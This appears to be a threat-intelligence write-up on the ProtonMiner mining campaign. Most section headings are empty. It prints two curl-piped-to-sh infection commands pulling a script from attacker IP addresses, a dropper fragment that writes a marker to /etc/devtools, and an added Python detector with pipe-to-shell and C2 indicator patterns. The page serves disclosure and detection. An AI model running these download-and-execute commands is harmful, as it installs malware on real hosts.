ProtonMiner Gains Momentum via Expanded Attack Surface

Background

Infection Outline

/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh
/bin/bash -c curl -fsSL http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh

Shell Script from a Stealthy Attacker

#!/bin/sh
# Drop a marker file; its presence records that the host has been touched
echo 1 > /etc/devtools
# $rtdir is set earlier in the dropper (outside this excerpt); its existence
# is used as the root check
if [ -f "$rtdir" ]
then
echo "i am root"
# Record root privileges in the same marker file
echo "goto 1" >> /etc/devtools
# download & attack
fi
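The two infection commands above and the marker file the dropper writes are the observable artifacts a defender can hunt for. The following detection example is added here and is not code from the original article: it flags download-piped-to-shell command lines, the C2 hosts, port and URL path token from the infection outline, and writes to /etc/devtools, and it inspects the marker file to tell whether the dropper believed it was running as root. The log format and the sample lines are constructed for the example; the indicator values are the ones quoted on this page.

```python
import os
import re

# Indicators taken from the infection commands and dropper script above.
KNOWN_C2_HOSTS = {"45.76.122.92", "207.148.70.143"}
KNOWN_C2_PORT = "8506"
KNOWN_PATH_TOKEN = "IOFoqIgyC0zmf2UR"
MARKER_FILE = "/etc/devtools"

# Constructed process-execution log lines (assumed format, not from the article);
# the command strings mirror what the page lists as the infection commands.
SAMPLE_LOG = """\
ts=1 host=db01 uid=1001 comm=bash cmdline="/bin/bash -c curl -fsSL http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh |sh"
ts=2 host=db01 uid=0 comm=sh cmdline="/bin/sh -c echo 1 > /etc/devtools"
ts=3 host=web02 uid=1000 comm=bash cmdline="/bin/bash -c curl -fsSL https://example.com/install.sh -o install.sh"
ts=4 host=web02 uid=1000 comm=bash cmdline="/bin/bash -c wget -qO- http://207.148.70.143:8506/IOFoqIgyC0zmf2UR/uuu.sh | sh"
"""

# A downloader whose output is piped straight into a shell interpreter.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sh|bash|dash)\b")
# host, optional port and optional path of every URL on the command line.
URL_RE = re.compile(r"https?://([\w.\-]+)(?::(\d+))?(/\S*)?")
CMDLINE_RE = re.compile(r'cmdline="(.*)"$')


def classify(cmdline):
    """Return the list of reasons a command line is suspicious (empty if none)."""
    reasons = []
    if PIPE_TO_SHELL.search(cmdline):
        reasons.append("download piped to shell")
    for host, port, path in URL_RE.findall(cmdline):
        if host in KNOWN_C2_HOSTS:
            reasons.append("known C2 host " + host)
        if port == KNOWN_C2_PORT:
            reasons.append("known C2 port " + port)
        if KNOWN_PATH_TOKEN in (path or ""):
            reasons.append("known URL path token")
    if MARKER_FILE in cmdline:
        reasons.append("writes marker file " + MARKER_FILE)
    return reasons


def scan_log(text):
    """Return [(line_no, reasons)] for every log line whose cmdline is suspicious."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = CMDLINE_RE.search(line)
        if not m:
            continue
        reasons = classify(m.group(1))
        if reasons:
            hits.append((n, reasons))
    return hits


def marker_status(path=MARKER_FILE):
    """Inspect the dropper's marker file.

    Returns None if the file is absent, "root" if it contains the "goto 1"
    line the script appends when its root check passes, else "non-root".
    """
    if not os.path.exists(path):
        return None
    with open(path) as f:
        lines = [l.strip() for l in f]
    return "root" if "goto 1" in lines else "non-root"


if __name__ == "__main__":
    for n, reasons in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (n, "; ".join(reasons)))
    print("marker file on this host:", marker_status())
```

Run against real data, feed it the `cmdline` field from auditd EXECVE records or your EDR's process telemetry; the generic pipe-to-shell rule will also catch the next variant that rotates IP, port and path, while the indicator matches give high-confidence alerts on this campaign.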

Propagation Method Analysis

Distribution Trend

Security Recommendations

IOC

Reference
